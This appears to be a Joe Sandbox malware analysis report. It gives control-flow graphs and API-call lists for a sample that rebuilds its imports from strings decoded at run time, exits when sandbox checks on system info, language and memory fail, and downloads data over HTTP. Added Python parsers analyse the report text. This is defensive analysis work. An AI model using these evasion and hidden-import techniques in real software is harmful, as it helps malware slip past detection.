                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 6552703953dfc7245c0b8358f3294ac3cf96cea8a480ca2f2b5b12dae08707b8
                                • Instruction ID: 2605c5b70f304265647293223283fda87585215ddeb1cad2dbebd8fb725df8b7
                                • Opcode Fuzzy Hash: 6552703953dfc7245c0b8358f3294ac3cf96cea8a480ca2f2b5b12dae08707b8
                                • Instruction Fuzzy Hash: C9529D71A016169BCB21FFA8DC45BAEB7BABF45300F084129F906A7251DB74ED028F94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 6c6390-6c63bd GetPEB 2126 6c65c3-6c6623 LoadLibraryA * 5 2125->2126 2127 6c63c3-6c65be call 6c62f0 GetProcAddress * 20 2125->2127 2129 6c6638-6c663f 2126->2129 2130 6c6625-6c6633 GetProcAddress 2126->2130 2127->2126 2132 6c666c-6c6673 2129->2132 2133 6c6641-6c6667 GetProcAddress * 2 2129->2133 2130->2129 2134 6c6688-6c668f 2132->2134 2135 6c6675-6c6683 GetProcAddress 2132->2135 2133->2132 2137 6c66a4-6c66ab 2134->2137 2138 6c6691-6c669f GetProcAddress 2134->2138 2135->2134 2139 6c66ad-6c66d2 GetProcAddress * 2 2137->2139 2140 6c66d7-6c66da 2137->2140 2138->2137 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(77190000,01331658), ref: 006C63E9
                                • GetProcAddress.KERNEL32(77190000,01331670), ref: 006C6402
                                • GetProcAddress.KERNEL32(77190000,01331730), ref: 006C641A
                                • GetProcAddress.KERNEL32(77190000,01331760), ref: 006C6432
                                • GetProcAddress.KERNEL32(77190000,013392A8), ref: 006C644B
                                • GetProcAddress.KERNEL32(77190000,013265D8), ref: 006C6463
                                • GetProcAddress.KERNEL32(77190000,01326898), ref: 006C647B
                                • GetProcAddress.KERNEL32(77190000,013316B8), ref: 006C6494
                                • GetProcAddress.KERNEL32(77190000,01331718), ref: 006C64AC
                                • GetProcAddress.KERNEL32(77190000,01331778), ref: 006C64C4
                                • GetProcAddress.KERNEL32(77190000,01331790), ref: 006C64DD
                                • GetProcAddress.KERNEL32(77190000,013268B8), ref: 006C64F5
                                • GetProcAddress.KERNEL32(77190000,013317A8), ref: 006C650D
                                • GetProcAddress.KERNEL32(77190000,013317D8), ref: 006C6526
                                • GetProcAddress.KERNEL32(77190000,01326858), ref: 006C653E
                                • GetProcAddress.KERNEL32(77190000,01331508), ref: 006C6556
                                • GetProcAddress.KERNEL32(77190000,01331520), ref: 006C656F
                                • GetProcAddress.KERNEL32(77190000,01326878), ref: 006C6587
                                • GetProcAddress.KERNEL32(77190000,01331808), ref: 006C659F
                                • GetProcAddress.KERNEL32(77190000,01326638), ref: 006C65B8
                                • LoadLibraryA.KERNEL32(013318B0,?,?,?,006C1C03), ref: 006C65C9
                                • LoadLibraryA.KERNEL32(01331898,?,?,?,006C1C03), ref: 006C65DB
                                • LoadLibraryA.KERNEL32(01331880,?,?,?,006C1C03), ref: 006C65ED
                                • LoadLibraryA.KERNEL32(01331850,?,?,?,006C1C03), ref: 006C65FE
                                • LoadLibraryA.KERNEL32(01331838,?,?,?,006C1C03), ref: 006C6610
                                • GetProcAddress.KERNEL32(76850000,013317F0), ref: 006C662D
                                • GetProcAddress.KERNEL32(77040000,01331820), ref: 006C6649
                                • GetProcAddress.KERNEL32(77040000,01331868), ref: 006C6661
                                • GetProcAddress.KERNEL32(75A10000,013397F0), ref: 006C667D
                                • GetProcAddress.KERNEL32(75690000,013268D8), ref: 006C6699
                                • GetProcAddress.KERNEL32(776F0000,01339178), ref: 006C66B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 006C66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 006C66C1
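Reading the list above together with the graph: the function at 006C6390 opens with a block labelled GetPEB, then issues twenty GetProcAddress calls against the single handle 77190000 before any LoadLibraryA, and every name argument except the final NtQueryInformationProcess is an address in the 0x0133xxxx range, outside the dumped image regions listed under Memory Dump Source (which begin at 006A0000). Those import names, and the five library names passed to LoadLibraryA, are therefore assembled in memory at run time rather than stored as plain strings in the image, which is why a string scan of the binary would show only the one literal. The parser below is an added example, not part of the Joe Sandbox report or of the sample's own code: it reads lines in the report's "APIs" format, groups GetProcAddress calls by module handle, and classifies each name argument as in-image, outside-image or literal. The image bounds are an assumption taken from the Memory Dump Source list (base 006A0000, last listed region D38000), and the sample lines are an excerpt of the ones printed on this page.

```python
import re

# Constructed input: an excerpt of the "APIs" lines the report prints for the
# resolver at 006C6390, plus one "Part of subcall" line and one line without
# arguments in the same report format, so the parser can be exercised offline.
API_LINES = """\
• GetProcAddress.KERNEL32(77190000,01331658), ref: 006C63E9
• GetProcAddress.KERNEL32(77190000,01331670), ref: 006C6402
• GetProcAddress.KERNEL32(77190000,013392A8), ref: 006C644B
• LoadLibraryA.KERNEL32(013318B0,?,?,?,006C1C03), ref: 006C65C9
• LoadLibraryA.KERNEL32(01331898,?,?,?,006C1C03), ref: 006C65DB
• GetProcAddress.KERNEL32(76850000,013317F0), ref: 006C662D
• GetProcAddress.KERNEL32(77040000,01331820), ref: 006C6649
• GetProcAddress.KERNEL32(776F0000,01339178), ref: 006C66B5
• GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 006C66CC
• Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331730), ref: 006C641A
• ExitProcess.KERNEL32 ref: 006C1C67
"""

# Assumption taken from the "Memory Dump Source" list on this page: the image is
# mapped from 0x006A0000 and the last listed region starts at 0x00D38000; one
# page past that start is used as the end (an approximation).
IMAGE_BASE, IMAGE_END = 0x006A0000, 0x00D39000

API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


def parse_api_line(line):
    """Parse one report API line into a dict, or return None if it is not one."""
    m = API_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "subcall": m.group("sub"),          # set for "Part of subcall function" lines
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [a.strip() for a in args.split(",")] if args else [],
        "ref": int(m.group("ref"), 16),     # call site inside the image
    }


def classify_arg(tok):
    """Where does a printed argument point? '?' is unknown, an 8-digit hex value
    is either inside or outside the dumped image, anything else is a literal
    string the tracer could read from the image."""
    if tok == "?":
        return "unknown"
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        value = int(tok, 16)
        return "in_image" if IMAGE_BASE <= value < IMAGE_END else "outside_image"
    return "literal"


def resolver_summary(text):
    """Group GetProcAddress calls by module handle and record how each name
    argument is passed; also classify the first argument of every LoadLibraryA.
    'Part of subcall' lines are skipped because they duplicate the callee's
    own list in the record of the caller."""
    handles, loads = {}, []
    for line in text.splitlines():
        rec = parse_api_line(line)
        if rec is None or rec["subcall"]:
            continue
        if rec["api"] == "LoadLibraryA" and rec["args"]:
            loads.append(classify_arg(rec["args"][0]))
        elif rec["api"] == "GetProcAddress" and len(rec["args"]) >= 2:
            handle, name = rec["args"][0], rec["args"][1]
            bucket = handles.setdefault(
                handle, {"in_image": 0, "outside_image": 0, "unknown": 0, "literal": []})
            kind = classify_arg(name)
            if kind == "literal":
                bucket["literal"].append(name)
            else:
                bucket[kind] += 1
    return handles, loads


if __name__ == "__main__":
    handles, loads = resolver_summary(API_LINES)
    for handle, bucket in handles.items():
        print(handle, bucket)
    print("LoadLibraryA name arguments:", loads)
```

Run on the full list printed above, every handle bucket ends up with outside_image counts only, except 776F0000, which also carries the single literal; that is the quickest way to confirm, from the report alone, that the import table is rebuilt from runtime-decoded strings.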
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 017548ee46629936faa7d00919df82bdec1d555d15d8b16cfe6265a45b7dde15
                                • Instruction ID: 71fc0f09ecaa7b905b7369f66db24c465253022d55fb757645c42ab363d67abf
                                • Opcode Fuzzy Hash: 017548ee46629936faa7d00919df82bdec1d555d15d8b16cfe6265a45b7dde15
                                • Instruction Fuzzy Hash: 6BA11BB5A13A00EFD754DF69FD48A263BB9F788641310871BE996D3364EB34AC00DB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 6c1bf0-6c1c0b call 6a2a90 call 6c6390 2146 6c1c0d 2141->2146 2147 6c1c1a-6c1c27 call 6a2930 2141->2147 2148 6c1c10-6c1c18 2146->2148 2151 6c1c29-6c1c2f lstrcpy 2147->2151 2152 6c1c35-6c1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 6c1c6d-6c1c7b GetSystemInfo 2152->2156 2157 6c1c65-6c1c67 ExitProcess 2152->2157 2158 6c1c7d-6c1c7f ExitProcess 2156->2158 2159 6c1c85-6c1ca0 call 6a1030 call 6a10c0 GetUserDefaultLangID 2156->2159 2164 6c1cb8-6c1cca call 6c2ad0 call 6c3e10 2159->2164 2165 6c1ca2-6c1ca9 2159->2165 2171 6c1ccc-6c1cde call 6c2a40 call 6c3e10 2164->2171 2172 6c1ce7-6c1d06 lstrlen call 6a2930 2164->2172 2165->2164 2166 6c1cb0-6c1cb2 ExitProcess 2165->2166 2171->2172 2185 6c1ce0-6c1ce1 ExitProcess 2171->2185 2178 6c1d08-6c1d0d 2172->2178 2179 6c1d23-6c1d40 lstrlen call 6a2930 2172->2179 2178->2179 2180 6c1d0f-6c1d11 2178->2180 2186 6c1d5a-6c1d7b call 6c2ad0 lstrlen call 6a2930 2179->2186 2187 6c1d42-6c1d44 2179->2187 2180->2179 2183 6c1d13-6c1d1d lstrcpy lstrcat 2180->2183 2183->2179 2193 6c1d7d-6c1d7f 2186->2193 2194 6c1d9a-6c1db4 lstrlen call 6a2930 2186->2194 2187->2186 2188 6c1d46-6c1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2196 6c1d81-6c1d85 2193->2196 2199 6c1dce-6c1deb call 6c2a40 lstrlen call 6a2930 2194->2199 2200 6c1db6-6c1db8 2194->2200 2196->2194 2198 6c1d87-6c1d94 lstrcpy lstrcat 2196->2198 2198->2194 2206 6c1ded-6c1def 2199->2206 2207 6c1e0a-6c1e0f 2199->2207 2200->2199 2201 6c1dba-6c1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 6c1df1-6c1df5 2206->2208 2209 6c1e16-6c1e22 call 6a2930 2207->2209 2210 6c1e11 call 6a2a20 2207->2210 2208->2207 2212 6c1df7-6c1e04 lstrcpy lstrcat 2208->2212 2215 6c1e24-6c1e26 2209->2215 2216 6c1e30-6c1e66 call 6a2a20 * 5 OpenEventA 2209->2216 2210->2209 2212->2207 2215->2216 2217 6c1e28-6c1e2a lstrcpy 2215->2217 2228 6c1e8c-6c1ea0 CreateEventA call 6c1b20 call 6bffd0 2216->2228 2229 6c1e68-6c1e8a CloseHandle Sleep OpenEventA 
2216->2229 2217->2216 2233 6c1ea5-6c1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                APIs
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331658), ref: 006C63E9
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331670), ref: 006C6402
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331730), ref: 006C641A
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331760), ref: 006C6432
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013392A8), ref: 006C644B
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013265D8), ref: 006C6463
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01326898), ref: 006C647B
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013316B8), ref: 006C6494
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331718), ref: 006C64AC
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331778), ref: 006C64C4
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,01331790), ref: 006C64DD
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013268B8), ref: 006C64F5
                                  • Part of subcall function 006C6390: GetProcAddress.KERNEL32(77190000,013317A8), ref: 006C650D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C1C2F
                                • ExitProcess.KERNEL32 ref: 006C1C67
                                • GetSystemInfo.KERNEL32(?), ref: 006C1C71
                                • ExitProcess.KERNEL32 ref: 006C1C7F
                                  • Part of subcall function 006A1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006A1046
                                  • Part of subcall function 006A1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 006A104D
                                  • Part of subcall function 006A1030: ExitProcess.KERNEL32 ref: 006A1058
                                  • Part of subcall function 006A10C0: GlobalMemoryStatusEx.KERNEL32 ref: 006A10EA
                                  • Part of subcall function 006A10C0: ExitProcess.KERNEL32 ref: 006A1114
                                • GetUserDefaultLangID.KERNEL32 ref: 006C1C8F
                                • ExitProcess.KERNEL32 ref: 006C1CB2
                                • ExitProcess.KERNEL32 ref: 006C1CE1
                                • lstrlen.KERNEL32(013391C8), ref: 006C1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1D15
                                • lstrcat.KERNEL32(00000000,013391C8), ref: 006C1D1D
                                • lstrlen.KERNEL32(006D4B98), ref: 006C1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D48
                                • lstrcat.KERNEL32(00000000,006D4B98), ref: 006C1D54
                                • lstrlen.KERNEL32(00000000), ref: 006C1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1D94
                                • lstrlen.KERNEL32(006D4B98), ref: 006C1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1DBC
                                • lstrcat.KERNEL32(00000000,006D4B98), ref: 006C1DC8
                                • lstrlen.KERNEL32(00000000), ref: 006C1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1E04
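The graph and API list above for 006C1BF0 show five ExitProcess exits. Two are reached directly from blocks that call GetSystemInfo and GetUserDefaultLangID, the latter right after the subcalls to 006A1030 and 006A10C0, which the API list resolves to VirtualAllocExNuma and GlobalMemoryStatusEx, each with an ExitProcess of its own. This is the gate sequence the report's "evasive API chain" signature refers to: the sample only proceeds to the OpenEventA/CreateEventA section and the call at 006C1E8C once every check has passed. The parser below is an added example, not part of the Joe Sandbox report or of the sample. It reads the graph text in the form printed on this page (node id, address range, label tokens, edges written as a->b), embeds the opening portion of the 006C1BF0 graph copied from above, and for every block that calls ExitProcess reports the nearest labelled predecessor blocks, i.e. the check that gates that exit. It assumes block addresses are lower-case hex containing at least one letter (true for the 6axxxx to 6cxxxx range here), which is how it tells an address from a repeat count such as "* 5".

```python
import re
from collections import defaultdict, deque

# Constructed input: the opening portion of the control-flow graph the report
# prints for the function at 006C1BF0, copied as printed (node id, address
# range, label tokens, then edges written as a->b).
CFG_TEXT = (
    "control_flow_graph 2141 6c1bf0-6c1c0b call 6a2a90 call 6c6390 2146 6c1c0d "
    "2141->2146 2147 6c1c1a-6c1c27 call 6a2930 2141->2147 2148 6c1c10-6c1c18 "
    "2146->2148 2151 6c1c29-6c1c2f lstrcpy 2147->2151 2152 6c1c35-6c1c63 "
    "2147->2152 2148->2147 2148->2148 2151->2152 2156 6c1c6d-6c1c7b GetSystemInfo "
    "2152->2156 2157 6c1c65-6c1c67 ExitProcess 2152->2157 2158 6c1c7d-6c1c7f "
    "ExitProcess 2156->2158 2159 6c1c85-6c1ca0 call 6a1030 call 6a10c0 "
    "GetUserDefaultLangID 2156->2159 2164 6c1cb8-6c1cca call 6c2ad0 call 6c3e10 "
    "2159->2164 2165 6c1ca2-6c1ca9 2159->2165 2171 6c1ccc-6c1cde call 6c2a40 "
    "call 6c3e10 2164->2171 2172 6c1ce7-6c1d06 lstrlen call 6a2930 2164->2172 "
    "2165->2164 2166 6c1cb0-6c1cb2 ExitProcess 2165->2166 2171->2172 "
    "2185 6c1ce0-6c1ce1 ExitProcess 2171->2185"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


def _is_address(tok):
    # Assumption: block addresses are lower-case hex with at least one letter.
    # A repeat count such as the 5 in "LoadLibraryA * 5" is all digits and so
    # never passes this test, which keeps it from starting a bogus node.
    return bool(ADDR_RE.match(tok)) and any(c in "abcdef" for c in tok)


def parse_cfg(text):
    """Parse the report's graph text.

    Returns (nodes, preds, succs): nodes maps node id -> {"addr", "label"},
    preds/succs map node id -> set of neighbour ids. A node definition is a
    decimal id followed by an address token; label tokens follow until the
    next edge or node definition. Ids that only appear in edges get no entry."""
    nodes, preds, succs = {}, defaultdict(set), defaultdict(set)
    toks = text.split()
    cur, i = None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            succs[a].add(b)
            preds[b].add(a)
            cur = None                      # an edge closes the current label
        elif tok.isdigit() and i + 1 < len(toks) and _is_address(toks[i + 1]):
            cur = int(tok)
            nodes[cur] = {"addr": toks[i + 1], "label": []}
            i += 1                          # the address token is consumed too
        elif cur is not None:
            nodes[cur]["label"].append(tok)
        i += 1
    for node in nodes.values():
        node["label"] = " ".join(node["label"])
    return nodes, preds, succs


def blocks_calling(nodes, api):
    """Addresses of every block whose label contains the API name as a token."""
    return sorted(n["addr"] for n in nodes.values() if api in n["label"].split())


def exit_gates(nodes, preds, api="ExitProcess"):
    """For every block that calls `api`, walk predecessors backwards until a
    labelled block is found. Unlabelled fall-through blocks are skipped and
    labelled ones are not expanded further, so each result is the nearest
    observable call (API or subroutine) on the way into that exit."""
    gates = {}
    for nid, node in nodes.items():
        if api not in node["label"].split():
            continue
        seen, queue, found = {nid}, deque(preds[nid]), []
        while queue:
            p = queue.popleft()
            if p in seen:
                continue
            seen.add(p)
            label = nodes.get(p, {}).get("label", "")
            if label:
                found.append((nodes[p]["addr"], label))
            else:
                queue.extend(preds[p])
        gates[node["addr"]] = sorted(found)
    return gates


if __name__ == "__main__":
    nodes, preds, _ = parse_cfg(CFG_TEXT)
    for exit_addr, checks in sorted(exit_gates(nodes, preds).items()):
        print(exit_addr, "<-", "; ".join(f"{a} [{lbl}]" for a, lbl in checks))
```

The same parser accepts the other graphs on this page unchanged; feeding it the 006C6390 graph, for instance, shows the GetPEB block branching either straight to the LoadLibraryA block or through the block with the twenty GetProcAddress calls.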
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 7778a0a1f73e30a64187a89c653ea8bcd2a93d1200b7ae415173037f0afba976
                                • Instruction ID: bae6e5f3bd5cf866b55d6fb0967fbbc11508e87c89d8a678e97a200f137ec0ce
                                • Opcode Fuzzy Hash: 7778a0a1f73e30a64187a89c653ea8bcd2a93d1200b7ae415173037f0afba976
                                • Instruction Fuzzy Hash: F1719E31542616ABCB60BBA5DC59FBE7B6BFF06701F04411EF946DA2A2DF349C018B60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 6a6c40-6a6c64 call 6a2930 2237 6a6c66-6a6c6b 2234->2237 2238 6a6c75-6a6c97 call 6a4bc0 2234->2238 2237->2238 2239 6a6c6d-6a6c6f lstrcpy 2237->2239 2242 6a6caa-6a6cba call 6a2930 2238->2242 2243 6a6c99 2238->2243 2239->2238 2247 6a6cc8-6a6cf5 InternetOpenA StrCmpCA 2242->2247 2248 6a6cbc-6a6cc2 lstrcpy 2242->2248 2244 6a6ca0-6a6ca8 2243->2244 2244->2242 2244->2244 2249 6a6cfa-6a6cfc 2247->2249 2250 6a6cf7 2247->2250 2248->2247 2251 6a6ea8-6a6ebb call 6a2930 2249->2251 2252 6a6d02-6a6d22 InternetConnectA 2249->2252 2250->2249 2261 6a6ec9-6a6ee0 call 6a2a20 * 2 2251->2261 2262 6a6ebd-6a6ebf 2251->2262 2253 6a6d28-6a6d5d HttpOpenRequestA 2252->2253 2254 6a6ea1-6a6ea2 InternetCloseHandle 2252->2254 2256 6a6d63-6a6d65 2253->2256 2257 6a6e94-6a6e9e InternetCloseHandle 2253->2257 2254->2251 2259 6a6d7d-6a6dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 6a6d67-6a6d77 InternetSetOptionA 2256->2260 2257->2254 2263 6a6daf-6a6dd3 call 6c71e0 call 6a2a20 * 2 2259->2263 2264 6a6dd4-6a6de4 call 6c3d90 2259->2264 2260->2259 2262->2261 2265 6a6ec1-6a6ec3 lstrcpy 2262->2265 2264->2263 2273 6a6de6-6a6de8 2264->2273 2265->2261 2276 6a6dee-6a6e07 InternetReadFile 2273->2276 2277 6a6e8d-6a6e8e InternetCloseHandle 2273->2277 2276->2277 2279 6a6e0d 2276->2279 2277->2257 2281 6a6e10-6a6e15 2279->2281 2281->2277 2283 6a6e17-6a6e3d call 6c7310 2281->2283 2286 6a6e3f call 6a2a20 2283->2286 2287 6a6e44-6a6e51 call 6a2930 2283->2287 2286->2287 2291 6a6e53-6a6e57 2287->2291 2292 6a6e61-6a6e8b call 6a2a20 InternetReadFile 2287->2292 2291->2292 2294 6a6e59-6a6e5b lstrcpy 2291->2294 2292->2277 2292->2281 2294->2292
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A6C6F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A6CC2
                                • InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A6CD5
                                • StrCmpCA.SHLWAPI(?,0133F3B0), ref: 006A6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006A6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,0133ED58,00000000,00000000,-00400100,00000000), ref: 006A6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006A6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006A6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006A6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006A6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 006A6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 006A6E8E
                                • InternetCloseHandle.WININET(?), ref: 006A6E98
                                • InternetCloseHandle.WININET(00000000), ref: 006A6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: dfc6906caef0dd0d810db5ac0fdb13f68986f2acee7d1b2f058989ff5a213d32
                                • Instruction ID: 5ab50b8ea0c7f804ed7e7d1969b90ce9f0aee2f780b9400f57ef9986b772af33
                                • Opcode Fuzzy Hash: dfc6906caef0dd0d810db5ac0fdb13f68986f2acee7d1b2f058989ff5a213d32
                                • Instruction Fuzzy Hash: F5817C71A41216ABDB20EFA4DC49FEE77BABF45710F044169F949E7280DB70AD048F94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 6a4a60-6a4afc RtlAllocateHeap 2867 6a4b7a-6a4bbe VirtualProtect 2850->2867 2868 6a4afe-6a4b03 2850->2868 2869 6a4b06-6a4b78 2868->2869 2869->2867
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A4AA2
